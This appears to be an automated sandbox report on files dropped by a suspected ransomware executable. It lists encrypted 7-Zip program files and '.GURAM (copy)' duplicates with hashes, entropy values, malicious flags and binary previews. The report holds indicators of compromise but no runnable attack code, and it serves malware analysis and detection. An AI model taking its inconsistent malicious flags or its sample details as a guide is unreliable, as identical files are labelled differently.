                                                                                                                                                                                                                                                Entropy (8bit):7.999182032268317
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:HTAbZgsBU8dtSKsqg+Fw9AUq6I6xLIZDPlYaP:zAb5B9D/sT+eFfLIVlxP
                                                                                                                                                                                                                                                MD5:2D4CB409C3591A0ECA8F45EF5CBF8620
                                                                                                                                                                                                                                                SHA1:A1E4D6C6F9E2894D95F46147FE74A5729B51BE18
                                                                                                                                                                                                                                                SHA-256:4E9C7001AE998DF10E03192E9013A7793379F0C0395CA34FC68EDFDBD8FC805C
                                                                                                                                                                                                                                                SHA-512:6D075781F81F6E8905C0024E6FA0E44ED7E695D6AA40D7687E3B3A037F090520BB84B87BA5755DDA15913CA8B5558AB0DA91E03E89F0E12259F0FCD1EB8288E2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6..k...6e.m. .!=\.?.*N|.UVg.6.w8Jm.4.]iz.....i_.P...'".E|.y....1..g..3M.7.t.4....5.G...1..-n....!Q.N..8...s..P#.w.;.o4i../.\U=..n5}2.>#J..W.-D{fO<.X..IdVT....`.t.L.4....@J.[#SG..O....#.....&H......hF..r6y@yB+. EQ.Eun.....j.fO.. .E........p./.q..u..I....._.....$Q.4tw ]5.....WT.S....lwW"x.#.=...^.WX.j pK&...j.cw............I.N.."xx.'k..;?7...5..2.tM...K.....M@.[.p..'.z..OG8<.j3.....1....1.d.o.4PE.d.*.H..,=....v..D.p..Np..NS3".....n..Ak.a..|.4@i..p.v.....Jc.....~G.Ii.V.W.L1C.9....[..{...t"*..o.e@.....q...(..Rr.z.).1..[..p@H.@$o..UVR..l_.?v,r.,...-......<.^...AG.....j........=i2...a...Dm..@...x.8.;~wH.u...p.%S.Q<d.......[...`&..Md,...Og.kt.......S.Z..N..(..6...|..*.j7.#.1D..q.2..AQV.$..w/Bh.........j..af.:.o..a...SXj...U..b..9y:..`.....k.X.~Gj....?.xF.Zr..H..y..G......w... ...Nf.>..?.1....H...VC..`{....<....d.l.....bm..6.]..YX.......z@w)r.).)%.m?......k...u..g.0N..M.......I..?U.k...;.\,]#...1....q.z..zL]A...EdkVgQ.&...u..S.t4d/... .3Y.5[q.....h/.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7z.sfx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):215136
                                                                                                                                                                                                                                                Entropy (8bit):7.999182032268317
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:HTAbZgsBU8dtSKsqg+Fw9AUq6I6xLIZDPlYaP:zAb5B9D/sT+eFfLIVlxP
                                                                                                                                                                                                                                                MD5:2D4CB409C3591A0ECA8F45EF5CBF8620
                                                                                                                                                                                                                                                SHA1:A1E4D6C6F9E2894D95F46147FE74A5729B51BE18
                                                                                                                                                                                                                                                SHA-256:4E9C7001AE998DF10E03192E9013A7793379F0C0395CA34FC68EDFDBD8FC805C
                                                                                                                                                                                                                                                SHA-512:6D075781F81F6E8905C0024E6FA0E44ED7E695D6AA40D7687E3B3A037F090520BB84B87BA5755DDA15913CA8B5558AB0DA91E03E89F0E12259F0FCD1EB8288E2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:6..k...6e.m. .!=\.?.*N|.UVg.6.w8Jm.4.]iz.....i_.P...'".E|.y....1..g..3M.7.t.4....5.G...1..-n....!Q.N..8...s..P#.w.;.o4i../.\U=..n5}2.>#J..W.-D{fO<.X..IdVT....`.t.L.4....@J.[#SG..O....#.....&H......hF..r6y@yB+. EQ.Eun.....j.fO.. .E........p./.q..u..I....._.....$Q.4tw ]5.....WT.S....lwW"x.#.=...^.WX.j pK&...j.cw............I.N.."xx.'k..;?7...5..2.tM...K.....M@.[.p..'.z..OG8<.j3.....1....1.d.o.4PE.d.*.H..,=....v..D.p..Np..NS3".....n..Ak.a..|.4@i..p.v.....Jc.....~G.Ii.V.W.L1C.9....[..{...t"*..o.e@.....q...(..Rr.z.).1..[..p@H.@$o..UVR..l_.?v,r.,...-......<.^...AG.....j........=i2...a...Dm..@...x.8.;~wH.u...p.%S.Q<d.......[...`&..Md,...Og.kt.......S.Z..N..(..6...|..*.j7.#.1D..q.2..AQV.$..w/Bh.........j..af.:.o..a...SXj...U..b..9y:..`.....k.X.~Gj....?.xF.Zr..H..y..G......w... ...Nf.>..?.1....H...VC..`{....<....d.l.....bm..6.]..YX.......z@w)r.).)%.m?......k...u..g.0N..M.......I..?U.k...;.\,]#...1....q.z..zL]A...EdkVgQ.&...u..S.t4d/... .3Y.5[q.....h/.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zCon.sfx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):193632
                                                                                                                                                                                                                                                Entropy (8bit):7.999017839398364
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:4NxV6P+t8ct1l+PFoppLGiENBG9cg4zMFkpPGvmLItrmQSp5QJH81G5+xia7EE9x:2OPlMTpx4NBw7Zm1ItrmQSE81Goca7FX
                                                                                                                                                                                                                                                MD5:C97D9492D6A9477542D22779C34D5536
                                                                                                                                                                                                                                                SHA1:AFBCE5C099CE49CE6DC9EDA5EA2C3E7345C4941E
                                                                                                                                                                                                                                                SHA-256:6A27F574D99773A61A46C47397CC988972D2C4E5D9705D65D9BEBCA9B3B21BBE
                                                                                                                                                                                                                                                SHA-512:2EC0BE655E84EFB9D78C0D69B1DC1C18ED789AA1747AEF9C94C43928FDE9B9B9E2EE17F922DC432222D461F5A0B6FEFEA1D389341A6CECF1AEA7BED534BD2CD8
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[%.U.h..E.....].....0.5..:.g...G..".Z.3..,.?.W<........n...S>..X4V..A?.{..*.yQ...^Y...p3m3.......J....pP.I.?9.D.0h....s.b.c'<;.1r4.w.h.s.....:)t%U.e`...."Hp..i.Z.....rM...x..:R..8....].50...u&..;#..}T...\.f.........a..x..{.K....2...Y!.T^/.^.........@8.)#...J$.h. r...2.~.........v.B/...n.s:.O.">.%..U..{.//.J.H......1.0...&<\....Q_.).....`..~q...U.;.{....6.L..A..D...C..3,.k...&C&...i.#x..Q..-..L.ep$t6...j.^b.....j4.M.,e.r..CA..%4....../Wn.pT.;.....4o...wp...8.......D....Y.w.......X.Q.5..P!......1R.5.V4........=.bJ.^...D....'D...gl../..jH..>[99i.....(YW...Rh_..j.wk...8..........k.......u..;.+.g(.'.DE..............T.$.P.........&@e...3L#)u.I.L..i..$aX~.I,qg.>..#..c..&".V..@._..I}g.U....3..h...8..<=.._.(..c..XYYh.b.T.$]....2D{....."..RF...w..3..~.t.K...c.....y.8.y.".]..+...B./...`h...I.#..*r.+;..Uye.9...-.F....8}%C./.u...5:.I.e..w...,o.[c6..........Q .j.Xk..L....+..S.=^....5{Jw......"D.~.K.4.h..H.R..4..ot./.R.HP.9.....X.i...0...5...)..W....as1#...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zCon.sfx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):193632
                                                                                                                                                                                                                                                Entropy (8bit):7.999017839398364
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:4NxV6P+t8ct1l+PFoppLGiENBG9cg4zMFkpPGvmLItrmQSp5QJH81G5+xia7EE9x:2OPlMTpx4NBw7Zm1ItrmQSE81Goca7FX
                                                                                                                                                                                                                                                MD5:C97D9492D6A9477542D22779C34D5536
                                                                                                                                                                                                                                                SHA1:AFBCE5C099CE49CE6DC9EDA5EA2C3E7345C4941E
                                                                                                                                                                                                                                                SHA-256:6A27F574D99773A61A46C47397CC988972D2C4E5D9705D65D9BEBCA9B3B21BBE
                                                                                                                                                                                                                                                SHA-512:2EC0BE655E84EFB9D78C0D69B1DC1C18ED789AA1747AEF9C94C43928FDE9B9B9E2EE17F922DC432222D461F5A0B6FEFEA1D389341A6CECF1AEA7BED534BD2CD8
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:[%.U.h..E.....].....0.5..:.g...G..".Z.3..,.?.W<........n...S>..X4V..A?.{..*.yQ...^Y...p3m3.......J....pP.I.?9.D.0h....s.b.c'<;.1r4.w.h.s.....:)t%U.e`...."Hp..i.Z.....rM...x..:R..8....].50...u&..;#..}T...\.f.........a..x..{.K....2...Y!.T^/.^.........@8.)#...J$.h. r...2.~.........v.B/...n.s:.O.">.%..U..{.//.J.H......1.0...&<\....Q_.).....`..~q...U.;.{....6.L..A..D...C..3,.k...&C&...i.#x..Q..-..L.ep$t6...j.^b.....j4.M.,e.r..CA..%4....../Wn.pT.;.....4o...wp...8.......D....Y.w.......X.Q.5..P!......1R.5.V4........=.bJ.^...D....'D...gl../..jH..>[99i.....(YW...Rh_..j.wk...8..........k.......u..;.+.g(.'.DE..............T.$.P.........&@e...3L#)u.I.L..i..$aX~.I,qg.>..#..c..&".V..@._..I}g.U....3..h...8..<=.._.(..c..XYYh.b.T.$]....2D{....."..RF...w..3..~.t.K...c.....y.8.y.".]..+...B./...`h...I.#..*r.+;..Uye.9...-.F....8}%C./.u...5:.I.e..w...,o.[c6..........Q .j.Xk..L....+..S.=^....5{Jw......"D.~.K.4.h..H.R..4..ot./.R.HP.9.....X.i...0...5...)..W....as1#...

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):953440
                                                                                                                                                                                                                                                Entropy (8bit):7.050814790404245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:OR9SfwDRmi78gkPXlyo0GkSKbhn/4TYjr9:+AaRmi78gkPX4o0G/KScjh
                                                                                                                                                                                                                                                MD5:F06ECCD6ED798A1576549CCDE3625860
                                                                                                                                                                                                                                                SHA1:4200AA20CB580851CE64B7D452AAC6E1A48EC76B
                                                                                                                                                                                                                                                SHA-256:D4FC7D340DA89FB568D1B6DAF5F0E036D15F0E52D72AF8675ED1E8FF7240E038
                                                                                                                                                                                                                                                SHA-512:5C4A567D94DF79346BBF0D0AAA6EEA57DBB3FC9869F0351E6BA4ED95DDC2271A9D421DD9EAC2A13F56B98CE3BABDB67809AAEC5486C7671A3D851F2536CF89F9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8K.d..+!.........n..:.........y.3k..Cf...U)..3R...vNv.......O.HX..w.S...G}.$..)=.<.\6..n..0]...$0...B. /..'.......j.uA.F.g\.`..H3...O..$...Z.t..2...'$..!..#....t.V....m...,...h.....~Ipe..pn....[.|-}......D.....b.3.b.Wu...6c.Kr.0-".mu...F.......z.<z...|b.Q..;<.[N..h........+VOj.}...r.V0%.....6W'n3.....)....i.zyd'Pg...S..)6y..'.7.&..;2......].[k.\!.!7..!.(.Z.....l..W#R.9.....P...8..:.s=X.86K.t?...kX..H..A....;...L*W.%...D.J...p..b....CO.).K%..-.HX....."..;q.x...F....nN.......`lo+....~E.(....]..`[n.+'L<..b&.x...z"..&...}v.&.:R..-.=0d.{:'.a.Ra.h....a..%.H.......`*.!..\.kY..b.1..|......;.ic}..z(.Oo{....wX{.!.j..Q:.[...*..]...3..1..d........"`L..(...~...V.36.)..g.W.qk......+..,...r .....$....T..t........>......6...g...RG..t.4`.!...e.?....7w3y.....X.[...cV.dY..0J..C0.....h....XT..V8.=..>...fh..2..g.|m9&..6.=M......[..Q.g.S....o.NM MP...2.{.2<2.>.g3T.}`........IP..a..-._.c.5..*........Z?.vV..,......../.Tz.B....8'1|..X.._........LID.=....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zFM.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):953440
                                                                                                                                                                                                                                                Entropy (8bit):7.050814790404245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:OR9SfwDRmi78gkPXlyo0GkSKbhn/4TYjr9:+AaRmi78gkPX4o0G/KScjh
                                                                                                                                                                                                                                                MD5:F06ECCD6ED798A1576549CCDE3625860
                                                                                                                                                                                                                                                SHA1:4200AA20CB580851CE64B7D452AAC6E1A48EC76B
                                                                                                                                                                                                                                                SHA-256:D4FC7D340DA89FB568D1B6DAF5F0E036D15F0E52D72AF8675ED1E8FF7240E038
                                                                                                                                                                                                                                                SHA-512:5C4A567D94DF79346BBF0D0AAA6EEA57DBB3FC9869F0351E6BA4ED95DDC2271A9D421DD9EAC2A13F56B98CE3BABDB67809AAEC5486C7671A3D851F2536CF89F9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.8K.d..+!.........n..:.........y.3k..Cf...U)..3R...vNv.......O.HX..w.S...G}.$..)=.<.\6..n..0]...$0...B. /..'.......j.uA.F.g\.`..H3...O..$...Z.t..2...'$..!..#....t.V....m...,...h.....~Ipe..pn....[.|-}......D.....b.3.b.Wu...6c.Kr.0-".mu...F.......z.<z...|b.Q..;<.[N..h........+VOj.}...r.V0%.....6W'n3.....)....i.zyd'Pg...S..)6y..'.7.&..;2......].[k.\!.!7..!.(.Z.....l..W#R.9.....P...8..:.s=X.86K.t?...kX..H..A....;...L*W.%...D.J...p..b....CO.).K%..-.HX....."..;q.x...F....nN.......`lo+....~E.(....]..`[n.+'L<..b&.x...z"..&...}v.&.:R..-.=0d.{:'.a.Ra.h....a..%.H.......`*.!..\.kY..b.1..|......;.ic}..z(.Oo{....wX{.!.j..Q:.[...*..]...3..1..d........"`L..(...~...V.36.)..g.W.qk......+..,...r .....$....T..t........>......6...g...RG..t.4`.!...e.?....7w3y.....X.[...cV.dY..0J..C0.....h....XT..V8.=..>...fh..2..g.|m9&..6.=M......[..Q.g.S....o.NM MP...2.{.2<2.>.g3T.}`........IP..a..-._.c.5..*........Z?.vV..,......../.Tz.B....8'1|..X.._........LID.=....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):701024
                                                                                                                                                                                                                                                Entropy (8bit):7.3018669753716585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:1girN+8rKhUdTC/wE1ZDH5yZ3uQb9uayTs:1pB2oYyTITs
                                                                                                                                                                                                                                                MD5:72124277A0A315935BD8325E372CD2FA
                                                                                                                                                                                                                                                SHA1:A45AABF90AF8B654CFB384DC707867F4DA25A11D
                                                                                                                                                                                                                                                SHA-256:814D4FF9ABBD9F06AD5585F9F72A276B09DBE53763D5BD646429C0C83B13F36E
                                                                                                                                                                                                                                                SHA-512:4E147362F3D28A626F01D7A89E5FC41892E2FE94E5499A5313AF352ECD0EB2E54B020A4120379F9778D2119D7B9D98301FDF28DE7E92CE2294408245147E64AC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.|..F......c..3......B.../..}x. ..'....zZ.iu...J.8.8.bC.f.:8..AP;..............#_.....d..C...>B.\.5..CS.HZ....+v`.dK!.N...W2..R~......blL..I..+.`....EY..M......S..;b7..VV....d.K.3.Gu.~9.[2X.c.R.O..{f+..@...M.A.......4i..V.;..\o[E.\.g../.-...|J.t.J..t....D...!!.)..a..2.......)=....F.........+.(...Sv...o..R..>.o3J!....[.e$<...z.5......^l...Co1.....:.=..I......U/.. &.q6.Aw...A,...)..(."..m,>d...Z.S..O....J}...#.klC.....9>.).r...F.....iB...JT.4y..*..m...!(V..#.q..C.(....%c..M..#.P....!..3...g.6[..R.C..:NV......>=>..Ij8.`..eXi..|..)U...G..!....HTZ....p;IA.hcSn.......s. .(.h..];!#.r....O.....M#...... j{.s.._/.dV....|d..}.w.C.E......4......Q...#.Ga.s...7L.g...P:.2..`.q.$..~D.>.[=H!(b>.pK.."r...F.99.G...o.'F].w..oZ...3..6>9.....d..G:.....ta.o...S..*.........5<..3.<."e.lz...k7".'^qg..\.Q....C.s.V...J....J`..[..h....jhZ.B.x.kX...Uq..2..y..Hs.s...E|.....o.n.o$.F..s..rO&........k&..._...s...=w.U....d.Ta...*.M...........^.....H..C.Jz..I.yuG..p..Z.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\7zG.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):701024
                                                                                                                                                                                                                                                Entropy (8bit):7.3018669753716585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:1girN+8rKhUdTC/wE1ZDH5yZ3uQb9uayTs:1pB2oYyTITs
                                                                                                                                                                                                                                                MD5:72124277A0A315935BD8325E372CD2FA
                                                                                                                                                                                                                                                SHA1:A45AABF90AF8B654CFB384DC707867F4DA25A11D
                                                                                                                                                                                                                                                SHA-256:814D4FF9ABBD9F06AD5585F9F72A276B09DBE53763D5BD646429C0C83B13F36E
                                                                                                                                                                                                                                                SHA-512:4E147362F3D28A626F01D7A89E5FC41892E2FE94E5499A5313AF352ECD0EB2E54B020A4120379F9778D2119D7B9D98301FDF28DE7E92CE2294408245147E64AC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.|..F......c..3......B.../..}x. ..'....zZ.iu...J.8.8.bC.f.:8..AP;..............#_.....d..C...>B.\.5..CS.HZ....+v`.dK!.N...W2..R~......blL..I..+.`....EY..M......S..;b7..VV....d.K.3.Gu.~9.[2X.c.R.O..{f+..@...M.A.......4i..V.;..\o[E.\.g../.-...|J.t.J..t....D...!!.)..a..2.......)=....F.........+.(...Sv...o..R..>.o3J!....[.e$<...z.5......^l...Co1.....:.=..I......U/.. &.q6.Aw...A,...)..(."..m,>d...Z.S..O....J}...#.klC.....9>.).r...F.....iB...JT.4y..*..m...!(V..#.q..C.(....%c..M..#.P....!..3...g.6[..R.C..:NV......>=>..Ij8.`..eXi..|..)U...G..!....HTZ....p;IA.hcSn.......s. .(.h..];!#.r....O.....M#...... j{.s.._/.dV....|d..}.w.C.E......4......Q...#.Ga.s...7L.g...P:.2..`.q.$..~D.>.[=H!(b>.pK.."r...F.99.G...o.'F].w..oZ...3..6>9.....d..G:.....ta.o...S..*.........5<..3.<."e.lz...k7".'^qg..\.Q....C.s.V...J....J`..[..h....jhZ.B.x.kX...Uq..2..y..Hs.s...E|.....o.n.o$.F..s..rO&........k&..._...s...=w.U....d.Ta...*.M...........^.....H..C.Jz..I.yuG..p..Z.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\History.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):58913
                                                                                                                                                                                                                                                Entropy (8bit):7.997166855225226
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:+59CP5dvLW0882XGTs8aKLl7BGMmXeTpCUdP:b5dvLC7XiJ7BGMU3UdP
                                                                                                                                                                                                                                                MD5:4D86FB8CDEB2C8420B629B7311075D7E
                                                                                                                                                                                                                                                SHA1:126C2537F86A643B7CDA039FE0A8CA146EA5E808
                                                                                                                                                                                                                                                SHA-256:962F61E2726C09E6CBB8B41AAAB3E52973A249C1F25AB53C021492A18F3FE43E
                                                                                                                                                                                                                                                SHA-512:FABDF76CB7C1C64440B0D57A692BAA045BEC03AABBDB608ED9BA1BB38712317195D9A2973909C135BA718BE092D08EE7BBD3DCB4B10488CA62B6B85C1EA4AD7A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Gq".......{.5........[`3N...T..?*5g.Z..{#s.nAk.U>.Q..H....:./....o.W7..:o...lJ...r........d.CW..%...T.4..G.=C.L......-:.ls.O..*......T.vos..G<.*.M..c..ON.&. Tx....V.r.C.kD.D.c....F.].#&Q.>.bM...0....v..|.&......g...e...c`..#...U(n.7c...........:.5a5.W.W.Ro+.H......~....J(.j..\...D{..fN....b....lF..5...LU....29.3.<H...=r.H8-.3y.OsW...8x.$.!...[TZE.k.F.F.d;...E.X3L........%$].od...R... ........e...:...xP.=].b7..9....*....{.......bs.....|.Y~&-.-_G....s/........@rrZ...n....`9$q..L..Q...j<....z.J....56.(..Z[-.....+.'.K..t....B.k.1Ah.u......1.......x...............|.xT.Ec.6.j*7P....z..k...v.Jw.A.0....z.A...>R.3.n..B.L.-.eN....z.}.I..(..2.;.Y..b..._.<.-.....`7.?..i..b........L.U.3.<....7B..I..V;|....u......'.X.#..l.sX..(.s`..l.Dz....(.7 #....v2.F....J.@dJ.f+.<.kl....ZY..................Vq..01..l.-0.^kfR ....8..&7..2..t...).87.-}..,..=..=%.....N..o)kEpA*J&..q...b$...U.L..Z!.*.k.....1.zp....-.P...W.6.rD. ..GMr...q.K..z...7..{...3y*..i.............,

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\History.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):58913
                                                                                                                                                                                                                                                Entropy (8bit):7.997166855225226
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:+59CP5dvLW0882XGTs8aKLl7BGMmXeTpCUdP:b5dvLC7XiJ7BGMU3UdP
                                                                                                                                                                                                                                                MD5:4D86FB8CDEB2C8420B629B7311075D7E
                                                                                                                                                                                                                                                SHA1:126C2537F86A643B7CDA039FE0A8CA146EA5E808
                                                                                                                                                                                                                                                SHA-256:962F61E2726C09E6CBB8B41AAAB3E52973A249C1F25AB53C021492A18F3FE43E
                                                                                                                                                                                                                                                SHA-512:FABDF76CB7C1C64440B0D57A692BAA045BEC03AABBDB608ED9BA1BB38712317195D9A2973909C135BA718BE092D08EE7BBD3DCB4B10488CA62B6B85C1EA4AD7A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Gq".......{.5........[`3N...T..?*5g.Z..{#s.nAk.U>.Q..H....:./....o.W7..:o...lJ...r........d.CW..%...T.4..G.=C.L......-:.ls.O..*......T.vos..G<.*.M..c..ON.&. Tx....V.r.C.kD.D.c....F.].#&Q.>.bM...0....v..|.&......g...e...c`..#...U(n.7c...........:.5a5.W.W.Ro+.H......~....J(.j..\...D{..fN....b....lF..5...LU....29.3.<H...=r.H8-.3y.OsW...8x.$.!...[TZE.k.F.F.d;...E.X3L........%$].od...R... ........e...:...xP.=].b7..9....*....{.......bs.....|.Y~&-.-_G....s/........@rrZ...n....`9$q..L..Q...j<....z.J....56.(..Z[-.....+.'.K..t....B.k.1Ah.u......1.......x...............|.xT.Ec.6.j*7P....z..k...v.Jw.A.0....z.A...>R.3.n..B.L.-.eN....z.}.I..(..2.;.Y..b..._.<.-.....`7.?..i..b........L.U.3.<....7B..I..V;|....u......'.X.#..l.sX..(.s`..l.Dz....(.7 #....v2.F....J.@dJ.f+.<.kl....ZY..................Vq..01..l.-0.^kfR ....8..&7..2..t...).87.-}..,..=..=%.....N..o)kEpA*J&..q...b$...U.L..Z!.*.k.....1.zp....-.P...W.6.rD. ..GMr...q.K..z...7..{...3y*..i.............,

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ba.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11849
                                                                                                                                                                                                                                                Entropy (8bit):7.982513335211101
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:mfXBSOvHpVX3S0o3SHukckqdidPSABu8nttQJkpZXJsylVUL:mfBSOBVX3/oCJp2iy8nt/pZXmywL
                                                                                                                                                                                                                                                MD5:FCA7EFE26F3FFCBB8340F21CC7999067
                                                                                                                                                                                                                                                SHA1:E54AD5B9C1396E880B7D572BBF625577123FB0E9
                                                                                                                                                                                                                                                SHA-256:7E6DE5AACF0CCE27F67C6BCB17E0B62E50D79D4C2BD86C21C1A92126DC23760E
                                                                                                                                                                                                                                                SHA-512:4E69D83271F82B31994B295BEF20C496C2C2A9F69D1DF7D9645BF3DB7FA964598CAD70570DAD85DED6752E2D3CB1521CA27EA959933838AD1AFB32DCB20478F2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5.A(R,.u.H...0..7!..B.S.......B....L>...(..~...i..h%..i.....=.h.bu.x......j-.......e..,...nB5.^.\.d......H......p..(..E..*S......JX.7ia..<M.<....r.u#rT'+.fr.....{..T..._A.K,...=....U.I.hL$^...du.C.vK.L./,]..5..`Q#:.F@.n..c.....r.op.....o.1\.s.\..S.G...[8...... ..'.0E.O9....a.....a......caa...}%X.m....+......,kS..].O.......`C.t.O.V..HBH.S.}I...Eg.)...C.!LY.P...L..{^..%.1...u..u2xhX....7..Ly..-.x...^2.;.Q.iM...p&.v..'.)!,.#Hm2..).~.^@..M...]..)...u.AO..M..!.....i!`L..!E.`..~Sm..?V..#.z...N.n.od..gCp.%....d..c.jfgW..!(...E;.b@....'.....g.y.q.{..`....8.|T.....;!..97..#........k.Oy.. ...A.1s.../...y....4.-.....%.cBj....,..zqs..@s./. ..U..q..H8..M../.....HGOm..gK...w.bL..CCvj!(.I~....L.#'C.....L.G.....3.\VqC..$......`.ad\r..r.._.c]..LE.'...\.n......&.G.%.~^~..^......#.N_@A.E..M.'....E..z....{2\=.......p.z....z....b7f\...X..<..S(..7l...9..$[.....e&.P).S..):...E.....Y..,...~$lM.f.U@V.."._d}...#.~..k.....C.h$.N..O!!4.....+s......p._..J....1..

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ba.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11849
                                                                                                                                                                                                                                                Entropy (8bit):7.982513335211101
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:mfXBSOvHpVX3S0o3SHukckqdidPSABu8nttQJkpZXJsylVUL:mfBSOBVX3/oCJp2iy8nt/pZXmywL
                                                                                                                                                                                                                                                MD5:FCA7EFE26F3FFCBB8340F21CC7999067
                                                                                                                                                                                                                                                SHA1:E54AD5B9C1396E880B7D572BBF625577123FB0E9
                                                                                                                                                                                                                                                SHA-256:7E6DE5AACF0CCE27F67C6BCB17E0B62E50D79D4C2BD86C21C1A92126DC23760E
                                                                                                                                                                                                                                                SHA-512:4E69D83271F82B31994B295BEF20C496C2C2A9F69D1DF7D9645BF3DB7FA964598CAD70570DAD85DED6752E2D3CB1521CA27EA959933838AD1AFB32DCB20478F2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
